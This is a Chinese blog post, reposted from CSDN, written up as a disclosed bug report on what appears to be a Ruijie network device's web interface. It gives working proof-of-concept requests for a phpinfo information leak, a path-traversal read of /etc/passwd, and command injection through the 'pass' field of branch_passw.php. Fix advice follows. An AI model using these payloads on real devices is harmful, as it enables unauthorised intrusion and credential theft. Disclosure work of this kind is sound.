前言

版权声明：本文为本博主在CSDN的原创文章搬运而来，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。                            

原文链接:https://blog.csdn.net/weixin_72543266/article/details/137440839

                                                                   免责声明

    以下漏洞均已经上报漏洞平台并已修复。请勿利用文章内的相关技术从事非法测试。若因此产生一切后果与本博客,阿里云平台及本人无关。

 仅接上一篇文章,本来都准备结束了,结果搜索文库,发现文库中还有这个系统没有进行测试的漏洞,既然RCE都有,那其他的会不会有呢,抱着试试的心态进行尝试,成功拿到第二个RCE.

挖洞公式

                              运气+长期积累+感想敢做+耐心+细心

漏洞介绍

信息泄露漏洞

 漏洞通常由于不当的信息处理和传输造成，比如在错误消息、日志文件或者网页源代码中暴露敏感数据。这些数据可能包括软件版本信息、配置文件内容、用户个人信息等。利用这些信息，攻击者可以对系统进行更有针对性的攻击。

任意文件读取漏洞

 漏洞允许未经授权的用户读取服务器上的任意文件，通常是由于应用程序在处理文件读取请求时没有正确的验证用户输入。通过这种漏洞，攻击者可以获取任意包含敏感信息的文档、配置文件或者其他不应公开的数据。

远程命令执行（RCE）漏洞

 RCE漏洞是最危险的漏洞之一，它允许攻击者在没有任何身份验证的情况下远程执行代码或命令。产生RCE的原因通常是由于应用程序使用了不安全的编程实践，比如使用eval()函数执行用户输入的字符串作为代码，或者通过调system()、exec()等函数执行由用户控制的命令。

漏洞详情

还是这个页面,惊喜不,没想到前台还是会存在漏洞,本次就从存在常见的未授权,开始测试

漏洞点1

前台存在phpinfo.view.php页面存在信息泄露漏洞直接在url后进行拼接:

poc:

/tool/view/phpinfo.view.php

通过使用前台CLI命令执行漏洞获得的管理员密码进行登录 admin/xxxxxxxxxx 进入后台

漏洞点2

后台download.php页面存在任意文件读取漏洞,在url后直接拼接poc

poc:

/download.php?a=read_txt&file=../../../../etc/passwd

漏洞点3

后台branch_passw.php页面存在远程命令执行漏洞(RCE),这里执行远程命令读取密码文件,写入到test_test.txt中

poc:

POST /itbox_pi/branch_passw.php?a=set HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Cookie: RUIJIEID=    xxxxxxxx            ;user=admin;
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
pass=|cat /etc/psswd>../test_test.txt

在url后直接拼接/test_test.txt进行访问,存在文件并且返回信息,说明RCE执行成功

修复建议

   针对前台存在的phpinfo.view.php信息泄露漏洞，建议删除或限制访问该文件，以防止敏感信息泄露。对于后台download.php的任意文件读取漏洞，建议对用户输入进行严格的验证和过滤，确保只允许访问合法文件，并限制可下载的文件类型。针对branch_passw.php页面的远程命令执行(RCE)漏洞，建议对用户输入进行严格的验证和过滤，避免使用不安全的函数，如eval()和exec()，并确保使用最新的安全补丁和配置。同时，可以考虑使用安全编程实践，如参数化查询和预编译语句，以降低安全风险。

总结

   对一个系统进行渗透过程中需要多查看现有页面的title,技术支持和属性的ico,和特殊的文件名(js)等,当然这些也是通过多看文章和思考长期积累而来的,需要坚持，耐心，细心，这次我就是灵光一闪想到了，这个系统就被拿下了,说不定你也能在无意之间碰到呢。